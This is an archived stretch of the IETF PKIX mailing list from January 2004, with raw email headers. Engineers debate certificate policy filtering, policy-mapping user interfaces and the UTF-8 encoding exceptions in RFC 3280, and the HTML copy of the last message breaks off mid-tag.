(PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from av1-1-sn1.fre.skanova.net (av1-1-sn1.fre.skanova.net [81.228.11.107]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UHCfMq002842 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 09:12:42 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: by av1-1-sn1.fre.skanova.net (Postfix, from userid 502) id 4684337F2F; Fri, 30 Jan 2004 16:11:07 +0100 (CET) Received: from smtp3-1-sn1.fre.skanova.net (smtp3-1-sn1.fre.skanova.net [81.228.11.163]) by av1-1-sn1.fre.skanova.net (Postfix) with ESMTP id AEC7737E81 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 16:11:07 +0100 (CET) Received: from arport (t11o913p46.telia.com [213.64.28.46]) by smtp3-1-sn1.fre.skanova.net (Postfix) with SMTP id 7DCBC37E4A for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 16:11:06 +0100 (CET) Message-ID: <00cd01c3e742$83c96ea0$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: <ietf-pkix@imc.org> Subject: Re: Last Call: 'Internet X.509 Public Key Infrastructure: Qualified Certificates Profile' to Proposed Standard Date: Fri, 30 Jan 2004 16:05:34 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Claim: If qcStatements under a given CP OID are allowed to vary (to indicate deviations in the policy in some way) a conforming QC relying party should check the contents of the qcStatements for each EE-certificate in order to not accidentally accept something it might not appreciate. Consequence: Assuming that the majority of the "relying parties" actually are server- based automated recipients like e-government services, it means that most QC-compliant relying party software MUST support qcStatement- filtering (which is exactly like an extra path validation procedure), or it requires RP security administrators to be discriminative about what QC CAs it should accept. I find this requirement unreasonable. Anders Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UH6MjO002334; Fri, 30 Jan 2004 09:06:22 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UH6Maw002333; Fri, 30 Jan 2004 09:06:22 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from osf1.gmu.edu (osf1.gmu.edu [129.174.1.13]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UH6KrU002307 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 09:06:21 -0800 (PST) (envelope-from pmhesse@geminisecurity.com) Received: from geminiph ([129.174.244.115]) by osf1.gmu.edu (8.8.8/8.8.8) with ESMTP id KAA82670; Fri, 30 Jan 2004 10:15:08 -0500 (EST) Message-Id: <200401301515.KAA82670@osf1.gmu.edu> From: "Peter Hesse" <pmhesse@geminisecurity.com> To: "'Anders Rundgren'" <anders.rundgren@telia.com>, "'David Cross'" <dcross@microsoft.com> Cc: <ietf-pkix@imc.org> Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Date: Fri, 30 Jan 2004 10:15:08 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Thread-Index: AcPnHwRhGKQq682qT7SKRBDisAkS1AAIt5dw In-Reply-To: <00eb01c3e714$9958ed50$0500a8c0@arport> Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders, When policy mappings are appropriately applied by the infrastructure, relying parties need only to know about their own domain policies. If I'm a user at "XYZ corp", I will know that there are three XYZ policies; "XYZ low", "XYZ medium", and "XYZ high". Even if the signer is someone from "Acme corp" with an "Acme External" certificate policy, the policy mappings should cause me to see it at "XYZ low"; I don't need to look at Acme's certificate policy document, my infrastructure has already done that and made their decision on how "Acme External" should be mapped to an XYZ policy. I do not understand what you think is a potential security hazard. The relying party's infrastructure is responsible for what the relying party trusts or does not trust. The relying party's infrastructure uses technical controls to control that trust, and the technical controls are in the certificates issued by the relying party's trust root. These controls include the certificate policies, policy mappings, policy constraints, basic constraints and name constraints extensions. Will this be useful to David's grandmother? No, of course not. David's grandmother has no need for this level of detail or assurance. (Not to mention she's probably using a $20 "your credit card number is good enough identity proofing for us" certificate.) A mutual fund manager who is responsible for $500 million in assets, or a battlefield commander responsible for the lives of thousands of soldiers probably *will* need this level of detail and assurance. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Anders Rundgren Sent: Friday, January 30, 2004 4:37 AM To: David Cross; Peter Hesse Cc: ietf-pkix@imc.org Subject: Re: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Peter, If a sender of a signed message is using a certificate from a PKI that requires policy filtering by the relying party (be it a server or Outlook), then the sender creates a potential security hazard as the relying party after trust anchor installation is likely to also "trust" what effectively could be completely other types of certificates. One culprit is that there is no good universal way to communicate CA policy information, except by requiring relying parties to decipher CP documents, making the configuration process less user-friendly. That is, multiple policy PKIs are not unsuitable only for consumers like David's grandma, but in most open environments where many relying parties are involved. Regarding the user interface, you forgot to mention that the policy settings must be per CA or groups of CAs further complicating matters. But maybe, we are really talking local PKIs here? Anders ----- Original Message ----- From: "David Cross" <dcross@microsoft.com> To: "Peter Hesse" <pmhesse@geminisecurity.com> Cc: <ietf-pkix@imc.org> Sent: Thursday, January 29, 2004 19:30 Subject: RE: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) Your 2 cents may not be too far off the mark...however, some comments... A. Today, in a Windows XP+ and Windows Server 2003 environment, we do have the capability to configure an Active Directory (domain) environment as you describe. I agree this is an example of the direction you describe. B. Technically, this also exists in most chaining engines and UI, although the policy information is not exposed as a first class citizen, argueably for several reasons such as my grandmother just is not interested in policy status of my signed mail to her, but I digress... Items C. and D. are the slippery slope that have obvious utility in the enterprise and/or high assurance environments, but not in the general global consumer community. My grandmother just won't understand the meaning of "initial-policy-mapping-inhibit" no matter how much she loves me. David B. Cross -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Hesse Sent: Thursday, January 29, 2004 7:05 AM To: 'Anders Rundgren'; 'Steve Hanna'; 'Stephen Kent' Cc: ietf-pkix@imc.org Subject: Policy User Interfaces (was RE: Setting X.509 Policy Data in IE, IIS, Outlook) I'll take the bait and throw this idea out there for you all to think about. It's not entirely my idea, it is based on ideas discussed with Dave Fillingham over the years. Let's assume for the moment that you're working with a PKI with a few different certificate policies in use; they might be hardware/software stored keys, or high/medium/low assurance. It is my suggestion that for a majority of PKI-enabled products with user interfaces, the best solution may be to do the following: A) Provide an administrative interface to map certificate policy OIDs to human readable names, and potentially human readable descriptions of the policies as well. B) When building/validating certification paths, set the initial-policy-set to any policy. When a path successfully validates, display the signature and validation status to the user, along with the human readable names for the policies in the authority-constrained-policy-set, or an indication that the path was not valid under any known policies. If these steps are followed, the user can just be informed that the message they received was valid for "Gemini medium assurance" or something like that. Not much difficulty to implement, nor would it be too difficult to educate the users. Now, assume we're dealing with a PKI larger than a single organization, where there are differing certificate policies and appropriate certificate policy mappings in place. (Such as a Bridge CA environment.) I'm assuming in this case that all certificates that I want my relying parties to accept would have certificate policies asserted. In this case, we add just two more steps: C) When validating paths, set initial-explicit-policy to TRUE, to ensure that only paths valid for a policy would be accepted. (Or, set requireExplicitPolicy through policyConstraints extensions in domain or cross-certificates.) D) Provide users with a switch to enable/disable initial-policy-mapping-inhibit. This may be referred to as "allow only my organization" and "allow other organizations". I'm presuming that cross-certificates would fail to validate if require-explicit was true and policy mappings don't take place. Likewise, even if I received a message from a user from a different organization, I would simply see that the message validated and that it was valid under the "Gemini low assurance policy" or something similar. This doesn't add much implementation difficulty (assuming a compliant path processing system) or make it too confusing for the user. Just my $0.02. --Peter +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGrxeI001208; Fri, 30 Jan 2004 08:53:59 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0UGrx4l001207; Fri, 30 Jan 2004 08:53:59 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mail-dub.microsoft.com (mail-dub.microsoft.com [213.199.128.160]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0UGruIp001188 for <ietf-pkix@imc.org>; Fri, 30 Jan 2004 08:53:56 -0800 (PST) (envelope-from stefans@microsoft.com) Received: from dub-imc-01.europe.corp.microsoft.com ([65.53.196.35]) by mail-dub.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Fri, 30 Jan 2004 16:40:56 +0000 Received: from 65.53.196.35 by dub-imc-01.europe.corp.microsoft.com (InterScan E-Mail VirusWall NT); Fri, 30 Jan 2004 16:40:54 -0000 Received: from EUR-MSG-03.europe.corp.microsoft.com ([65.53.192.44]) by dub-imc-01.europe.corp.microsoft.com with Microsoft SMTPSVC(5.0.2195.6713); Fri, 30 Jan 2004 16:40:51 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7122.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="------------InterScan_NT_MIME_Boundary" Subject: RE: UTF-8 encoding after December 31 2003 Date: Fri, 30 Jan 2004 16:40:54 -0000 Message-ID: <0C3042E92D8A714783E2C44AB9936E1DB48142@EUR-MSG-03.europe.corp.microsoft.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: UTF-8 encoding after December 31 2003 Thread-Index: AcPkVeHrRXXPuwIBSvyHAkalHTFTOAC+LCrw From: "Stefan Santesson" <stefans@microsoft.com> To: <jimsch@exmsft.com>, <ietf-pkix@imc.org>, <kent@bbn.com>, "Tim Polk" <wpolk@nist.gov>, "Russ Housley" <housley@vigilsec.com> X-OriginalArrivalTime: 30 Jan 2004 16:40:51.0234 (UTC) FILETIME=[D23FE020:01C3E74F] Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This is a multi-part message in MIME format. --------------InterScan_NT_MIME_Boundary Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C3E74F.BDE13EC0" ------_=_NextPart_001_01C3E74F.BDE13EC0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Due to the silence on this thread I have to restate the question and ask for WG chairs and RFC 3280 editors' clarification: =20 I'm asking for clarification on how to interpret the exceptions to UTF-8 encoding after December 31, 2003 stated in 4.1.2.4. =20 =20 Case: I have a CA (root or intermediate) with an operational CA certificate that is valid far into the future e.g. 2010. This CA certificate has Issuer and subject name in old encoding. =20 Question:=20 Is it OK to issue certificates from that CA that has an Issuer name matching the subject name of the existing CA certificate (in old encoding)? =20 =20 /Stefan ________________________________ From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Jim Schaad Sent: den 26 januari 2004 21:32 To: Stefan Santesson; ietf-pkix@imc.org Subject: RE: UTF-8 encoding after December 31 2003 =20 Stefan, =20 I don't read (b) in the same way as you do. I read this as saying if a CA has a certificate with a non-UTF8 encoded subject name, then the issuer name in all certificates it issues MUST be the non-UTF8 subject name of the CA. This means you don't need to update the CA certificate, but that all new certificates issued by the CA must be using UTF8 strings. =20 jim -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Stefan Santesson Sent: Monday, January 26, 2004 9:23 AM To: ietf-pkix@imc.org Subject: UTF-8 encoding after December 31 2003 All, =20 I have a problem with the UTF-8 requirements in RFC 3280 after December 31, and would appreciate guidance on interpretation of RFC 3280 as well as other implementers view on this. =20 The situation: =20 Conforming CA:s must encode attributes of DirectotyString types as UTF-8 after=20 December 31, 2003. =20 Exceptions are stated in RFC 3280 (section 4.1.2.4): =20 Exceptions to the December 31, 2003 UTF8 encoding requirements are as follows: =20 (a) CAs MAY issue "name rollover" certificates to support an orderly migration to UTF8String encoding. Such certificates would include the CA's UTF8String encoded name as issuer and and the old name encoding as subject, or vice-versa. =20 (b) As stated in section 4.1.2.6, the subject field MUST be populated with a non-empty distinguished name matching the contents of the issuer field in all certificates issued by the subject CA regardless of encoding. =20 =20 My interpretation of this is: =20 a) only applies for self issued certificates with the same CA name as issuer and subject (but in different encodings). Introducing such name roll-over certificates extend the certificate chain and may be problematic since it may break both naming and path length constraints expressed by chaining CAs. =20 b) seams to be a catch 22. You can populate the subject field with old encoding to match old encoded issuer names in descending certificates, but since no descending CA can populate the issuer field with old encoding it doesn't really apply. =20 =20 The issue: There seems to be a problem with practical reality here in case the interpretation above is correct. =20 Question 1) What if I have a Root CA valid to 2020 with subject and issuer name in old encoding? =20 Can that Root CA issue an intermediary CA certificate with the issuer field in old encoding, matching the subject field of the current root CA Certificate? =20 Question 2) What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the issuer name in old encoding, matching the encoding of the current CA certificate until it expires, or must this CA change its name and have its CA certificate renewed before December 31? =20 If RFC 3280 prevents operating CAs to issue certificates with the issuer field matching the CA:s current certificate, until it expires, then we face a huge legacy problem. Especially since name matching for different encoding types are not required. =20 4.1.2.4 states "(a) attribute values encoded in different types (e.g., PrintableString and BMPString) MAY be assumed to represent different strings;" =20 =20 If my concerns are wrong and the issuing such certificates is allowed, then this needs to be clarified. =20 =20 =20 Stefan Santesson Program Manager, Windows Security =20 ------_=_NextPart_001_01C3E74F.BDE13EC0 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:v=3D"urn:schemas-microsoft-com:vml" = xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <!--[if !mso]> <style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--> <title>Message</title> <style> <!-- /* Font Definitions */ @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0cm; margin-bottom:.0001pt; font-size:10.0pt; font-family:"Courier New";} span.EmailStyle18 {mso-style-type:personal; font-family:Arial; color:windowtext;} span.EmailStyle20 {mso-style-type:personal-reply; font-family:Arial; color:navy;} @page Section1 {size:612.0pt 792.0pt; margin:70.85pt 70.85pt 70.85pt 70.85pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Due to the silence on this thread I = have to restate the question and ask for WG chairs and RFC 3280 = editors’ clarification:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>I’m asking for clarification = on how to interpret the exceptions to UTF-8 encoding after December 31, 2003 = stated in 4.1.2.4.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Case:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>I have a CA (root or intermediate) = with an operational CA certificate that is valid far into the future e.g. 2010. = This CA certificate has Issuer and subject name in old = encoding.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Question: = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Is it OK to issue certificates from = that CA that has an Issuer name matching the subject name of the existing CA certificate (in old encoding)?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'><o:p> </o:p></span></font></p> <div> <p class=3DMsoNormal><strong><b><font size=3D2 color=3Dolive = face=3DArial><span style=3D'font-size:10.0pt;font-family:Arial;color:olive'>/Stefan</span></= font></b></strong><o:p></o:p></p> </div> <div style=3D'border:none;border-left:solid blue 1.5pt;padding:0cm 0cm = 0cm 4.0pt'> <div> <div class=3DMsoNormal align=3Dcenter style=3D'text-align:center'><font = size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'> <hr size=3D2 width=3D"100%" align=3Dcenter tabindex=3D-1> </span></font></div> <p class=3DMsoNormal><b><font size=3D2 face=3DTahoma><span = style=3D'font-size:10.0pt; font-family:Tahoma;font-weight:bold'>From:</span></font></b><font = size=3D2 face=3DTahoma><span style=3D'font-size:10.0pt;font-family:Tahoma'> owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] = <b><span style=3D'font-weight:bold'>On Behalf Of </span></b>Jim Schaad<br> <b><span style=3D'font-weight:bold'>Sent:</span></b> den 26 januari 2004 = 21:32<br> <b><span style=3D'font-weight:bold'>To:</span></b> Stefan Santesson; ietf-pkix@imc.org<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> RE: UTF-8 = encoding after December 31 2003</span></font><o:p></o:p></p> </div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'><o:p> </o:p></span></font></p> <div> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:blue'>Stefan,</span></font><o:p></o:p></p>= </div> <div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'> <o:p></o:p></span></font></p> </div> <div> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:blue'>I don't read (b) in the same way as = you do. I read this as saying if a CA has a certificate with a = non-UTF8 encoded subject name, then the issuer name in all certificates it issues = MUST be the non-UTF8 subject name of the CA. This means you don't need = to update the CA certificate, but that all new certificates issued by the = CA must be using UTF8 strings.</span></font><o:p></o:p></p> </div> <div> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'> <o:p></o:p></span></font></p> </div> <div> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:blue'>jim</span></font><o:p></o:p></p> </div> <blockquote style=3D'border:none;border-left:solid blue = 1.5pt;padding:0cm 0cm 0cm 3.0pt; margin-left:2.95pt;margin-top:5.0pt;margin-right:0cm;margin-bottom:5.0pt'= > <p class=3DMsoNormal style=3D'margin-bottom:12.0pt'><font size=3D2 = face=3DTahoma><span style=3D'font-size:10.0pt;font-family:Tahoma'>-----Original = Message-----<br> <b><span style=3D'font-weight:bold'>From:</span></b> = owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] <b><span = style=3D'font-weight:bold'>On Behalf Of </span></b>Stefan Santesson<br> <b><span style=3D'font-weight:bold'>Sent:</span></b> Monday, January 26, = 2004 9:23 AM<br> <b><span style=3D'font-weight:bold'>To:</span></b> ietf-pkix@imc.org<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> UTF-8 encoding = after December 31 2003</span></font><o:p></o:p></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>All,<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>I have a problem with the UTF-8 requirements in RFC 3280 after = December 31, and would appreciate guidance on interpretation of RFC 3280 as well = as other implementers view on this.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The situation:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Conforming CA:s must encode attributes of DirectotyString types = as UTF-8 after <o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>December 31, 2003.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Exceptions are stated in RFC 3280 (section = 4.1.2.4):<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> Exceptions to the December 31, 2003 UTF8 encoding requirements are as<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> follows:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (a) CAs MAY issue = "name rollover" certificates to support an<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> orderly migration to UTF8String encoding. Such certificates would<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> include the CA's UTF8String = encoded name as issuer and and the old<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> name encoding as subject, or = vice-versa.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> (b) As stated in section = 4.1.2.6, the subject field MUST be<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> populated with a non-empty = distinguished name matching the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> contents of the issuer field in = all certificates issued by the<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'> subject CA regardless of = encoding.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>My interpretation of this is:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>a) only applies for self issued certificates with the same CA = name as issuer and subject (but in different encodings). Introducing such name = roll-over certificates extend the certificate chain and may be problematic since = it may break both naming and path length constraints expressed by chaining = CAs.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>b) seams to be a catch 22. You can populate the subject field = with old encoding to match old encoded issuer names in descending certificates, = but since no descending CA can populate the issuer field with old encoding = it doesn’t really apply.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>The issue:<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>There seems to be a problem with practical reality here in case = the interpretation above is correct.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 1)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a Root CA valid to 2020 with subject and issuer = name in old encoding?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Can that Root CA issue an intermediary CA certificate with the = issuer field in old encoding, matching the subject field of the current root CA Certificate?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>Question 2)<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>What if I have a CA with a current operating CA certificate that expires 2006. Can this CA issue certificates after December 31, with the = issuer name in old encoding, matching the encoding of the current CA = certificate until it expires, or must this CA change its name and have its CA certificate = renewed before December 31?<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'><o:p> </o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 10.0pt'>If RFC 3280 prevents operating CAs to issue certificates with = the issuer field matching the CA:s current certificate, until it expires, = then we face a huge legacy problem. Especially since name matching for different encoding types are not required.<o:p></o:p></span></font></p> <p class=3DMsoPlainText><font size=3D2 face=3D"Courier New"><span = style=3D'font-size: 